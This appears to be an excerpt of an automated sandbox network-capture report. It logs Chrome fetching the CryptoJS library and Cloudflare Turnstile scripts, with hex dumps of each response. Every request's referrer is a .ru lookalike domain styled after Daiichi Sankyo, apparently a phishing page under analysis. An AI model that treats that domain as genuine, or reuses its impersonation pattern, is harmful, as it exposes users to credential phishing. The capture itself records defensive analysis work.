                                        Sec-Fetch-Dest: script
                                        Referer: https://daiichi-sankyo.uronfecit.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:21 UTC963INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:21 GMT
                                        Content-Type: application/javascript; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=30672000
                                        ETag: W/"61182885-40eb"
                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                        cf-cdnjs-via: cfworker/kv
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Timing-Allow-Origin: *
                                        X-Content-Type-Options: nosniff
                                        CF-Cache-Status: HIT
                                        Age: 1103529
                                        Expires: Sun, 28 Dec 2025 08:16:21 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ireyTu0%2FUJ9q%2FAmyHEfnUvpuR9IsR0l74c8TZ%2FWN4BhkYXLdOuuwuOpJZGSyOEDmheZ8k1EGTmgsagFg%2BxoDQ79E3uG4UovQh0tjyVprlVMT1HRU%2F7mG8ZZ3aRd5N7wRl7YYFO8u"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Strict-Transport-Security: max-age=15780000
                                        Server: cloudflare
                                        CF-RAY: 8fe28156f80af78d-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:21 UTC406INData Raw: 33 39 37 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                        Data Ascii: 3976!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                        2025-01-07 08:16:21 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                        Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                        2025-01-07 08:16:21 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                        Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                        2025-01-07 08:16:21 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                        Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                        2025-01-07 08:16:21 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                        Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                        2025-01-07 08:16:21 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                        Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                        2025-01-07 08:16:21 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                        Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                        2025-01-07 08:16:21 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                        Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                        2025-01-07 08:16:21 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                        Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                        2025-01-07 08:16:21 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                        Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.449746104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:21 UTC659OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://daiichi-sankyo.uronfecit.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:21 UTC386INHTTP/1.1 302 Found
                                        Date: Tue, 07 Jan 2025 08:16:21 GMT
                                        Content-Length: 0
                                        Connection: close
                                        access-control-allow-origin: *
                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                        cross-origin-resource-policy: cross-origin
                                        location: /turnstile/v0/g/849bfe45bf45/api.js
                                        Server: cloudflare
                                        CF-RAY: 8fe28156fae643fd-EWR
                                        alt-svc: h3=":443"; ma=86400


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.449748104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:22 UTC658OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://daiichi-sankyo.uronfecit.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:22 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:22 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8fe2815aaa4e4356-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:22 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-07 08:16:22 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                        Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                        2025-01-07 08:16:22 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                        Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                        2025-01-07 08:16:22 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                        Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                        2025-01-07 08:16:22 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                        Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
